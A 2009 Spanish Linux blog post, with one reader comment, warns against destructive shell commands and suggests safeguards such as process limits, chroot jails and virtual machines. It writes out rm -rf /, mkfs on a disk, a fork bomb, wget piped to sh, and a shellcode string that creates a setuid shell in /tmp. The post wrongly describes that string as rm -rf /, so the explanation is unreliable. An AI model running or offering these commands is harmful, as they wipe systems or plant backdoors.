lunes, 1 de junio de 2009

Comandos peligrosos

He estado dudando mucho si publicar o no este tema sobre comandos que podrían dañar tus archivos o tu sistema operativo por completo, ya que no quisiera ser responsable de que por curiosidad los ejecutaras y se estropeara tu sistema; por lo tanto te lo digo: NO EJECUTES estos comandos, aunque estos comandos no hacen gran cosa si no se ejecutan como root

--------------------------------------------

rm -rf /
Esto borrará recursivamente y de manera forzada todos los archivos de tu directorio raíz, o root.

Como hay "gente pa to" en algún lugar he leído que un tio ejecuto ese comando, grabando el resultado con una videocámara, para luego poner el resultado en youtube; luego supongo que reinstalaria el sistema con una copia de seguridad que tubiera a buen recaudo.

Para saber el buen uso de este comando teclea en una terminal: man rm
--------------------------------------------
char esp[] __attribute__ ((section(”.text”))) /* e.s.p
r
elease */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″

“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Esta es la versión hexadecimal de [rm -rf /], que podría confundir a los más experimentados.
--------------------------------------------
mkfs.ext3 /dev/sda
Se formateará (o borrará) todos los archivos en el dispositivo mencionado después del comando mkfs.

Para saber el buen uso de este comando teclea en una terminal: man mkfs --------------------------------------------
:(){:|:&};:
Conocido como forkbomb, le ordenará a tu sistema ejecutar una gran cantidad de procesos hasta que éste se congele. Frecuentemente puede llevarnos a datos corruptos.

Una forma de hacer que no pase nada con la "forkbomb" es editar en modo root y añadir al final del archivo/etc/security/limits.conf la línea :
% hard nproc 50
Con esto limitamos a 50 el número máximos de procesos que puede ejecutar el usuario.
Guardamos la configuracion (Ctrl + O) y salimos (Ctrl + X).
Ahora para que empecemos a estar protegidos solo basta reiniciar el PC.
Si al configurar el valor en 50, recibes cada tanto un error como este: bash: fork: recurso temporalmente no disponible, esto es debido a que el usuario esta ejecutando mas de 50 procesos normalmente, por lo cual para no recibirlo, modifica el valor a un nivel mas alto, de acuerdo a la cantidad de procesos que ejecutes normalmente: puedes saberlo ejecutando en una terminal el comando top, y viendo que número hay después de Tasks.

--------------------------------------------
cualquier_comando > /dev/sda
Con este comando, se escribirá información en un block que usualmente corresponde al sistema de archivos, lo que resulta en una pérdida total de información.
--------------------------------------------
wget http://alguna_fuente_desconocida -O- | sh
Nunca descargues archivos de fuentes desconocidas, pues después podrías ejecutar cualquier código malicioso que se te envíe.
--------------------------------------------
mv /home/tu_nombre/* /dev/null
Se moverán todos los archivos en tu directorio home a un lugar que no existe. Esto quiere decir que no volverás a ver esos documentos de nuevo.

Para saber el buen uso de este comando teclea en una terminal: man mv

-------------------------------------------

No debería uno fiarse de cualquier script con comandos que uno no entiende. Esto no sera un virus, porque no se autoreproduce, pero llamémosle como queramos es un peligro. Y no creo que haya una herramienta, método o algo que nos ayude a comprobar antes de ejecutar un script que no tenga algo malicioso de ese tipo, salvo aprender comandos y mas comandos, para estudiar el script antes de ejecuarlo, lo cual me parece que esta fuera del alcance de la mayoria de los que usamos linux.

De todas formas se puede aprender mucho usando la Terminal para saber sobre los comandos, si tecleas: man nombre del comando te aparece información sobre ese comando, lo que significa, sus opciones, usos etc. Y si quieres aprender a crear tus propios scripts, aquí explico como crear un script básico.

Que conste que por ahora todos los scripts que he usado: http://g-scripts.sourceforge.net/nautilus-scripts.javielinuxhttp://gnome-look.org/  (entre ellos: nautilus cripts pack) o no me han funcionado pero tampoco me han dado problemas, o si me han funcionado y sin problemas.

Si instalas/ejecutas cualquier cosa SIEMPRE es por tu cuenta y riesgo. Lo que ocurre es que es poco probable que si alguien tiene desde hace tiempo una web de paquetes o de scripts y todo el mundo está contentísimo con ella vaya a tener algún script malintencionado.

También hay que tener cuidado con los scripts, comandos, etc que te puedan aconsejar que ejecutes en una página, blog, foro, etc, No teclees nada en la terminal procedente de alguien en el que no confíes.

Pero todo tiene su solución. Se pueden ejecutar los scripts sin firmar: 1- en una jaula chroot 2- directamente en una máquina virtual, con Virtualbox con "una instantánea" del Sistema. De esta forma el desastre se reduce prácticamente a nada. 3- En un pc de prueba con el mismo sistema linux que tengamos en nuestro pc de trabajo.

------------------------------

Esta es la explicación de lo que es una "jaula chroot" dada por "Guadafan":

El comando chroot sirve para cambiar el directorio raíz. Imagina que en guadalinex tienes una carpeta llamada /home/hatteras/misegundoguadalinex
Dentro de esa carpeta tienes la copia de otra distro básica o de tu misma guadalinex, es decir, que tendrías algo así como:

/home/hatteras/misegundoguadalinex/bin
/home/hatteras/misegundoguadalinex/sbin
/home/hateras/misegundoguadalinex/usr
/home/hateras/misegundoguadalinex/etc
/home/hateras/misegundoguadalinex/home
...

Pues si haces chroot /home/hateras/misegundoguadalinex automáticamente cambiarías el directorio de trabajo a este directorio y el directorio raiz / ahora sería misegundoguadalinex/, pero totalmente transparente. Al hacer chroot estarías ejecutando comandos que hay dentro de misegundoguadalinex no de tu guadalinex original.

-------------------------------------------

1 comentario:

  1. Esos videos de los que hablas al principio son estos:

    http://www.youtube.com/watch?v=N0tIkhr-lcI

    http://www.youtube.com/watch?v=kAndMGl9h08

    También se podrían añadir a comandos poco recomendables "cleanlinks" como root desde el directorio raiz y el comando "yes" enviando la salida a un archivo.

    Por ejemplo #yes > nombre_de_archivo
    Esto haría que tuviesemos un archivo de varios gigas en pocos segundos.Con parar el proceso y eliminar el archivo estaría resuelto.
    Y "clenlinks" lo que hace es eliminar links y carpetas vacías.Si lo ejecutamos como root desde "/" nos eliminaría un monton de carpetas que están vacías en ese momento pero que son necesarias.P.ej /media /var/cache/apt/archives/partial y otras muchas.

    ResponderEliminar

A la vez que haces un comentario, por favor da una puntuación al tema: malo, normal, bueno o muy bueno.
Gracias.